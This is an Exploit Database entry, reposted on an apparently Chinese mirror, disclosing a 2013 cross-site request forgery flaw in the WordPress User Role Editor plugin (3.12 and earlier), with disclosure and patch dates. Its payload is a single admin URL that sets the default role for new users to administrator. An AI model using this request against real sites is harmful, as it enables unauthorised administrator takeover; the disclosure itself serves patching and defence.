WordPress Plugin User Role Editor 3.12 – Cross-Site Request Forgery

• Exploit Database
• 9 阅读

• 作者： Henry Hoggard
  日期： 2013-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/25721/

• # Exploit Title: WP User Role Editor CSRF
  # Date: 19/5/13
  # Exploit Author: Henry Hoggard
  # Author Website: http://henryhoggard.co.uk
  # Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
  # Software Link:https://wordpress.org/support/plugin/user-role-editor
  # Version: <=3.12
  # Tested on: Debian
  # CVE : none yet
  
  Notified Dev: 16/05/13
  Patch Released (3.14): 17/05/13
  
  Description:
  This allows you to sign up with admin privileges if you make the admin
  visit your CSRF script.
  
  http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator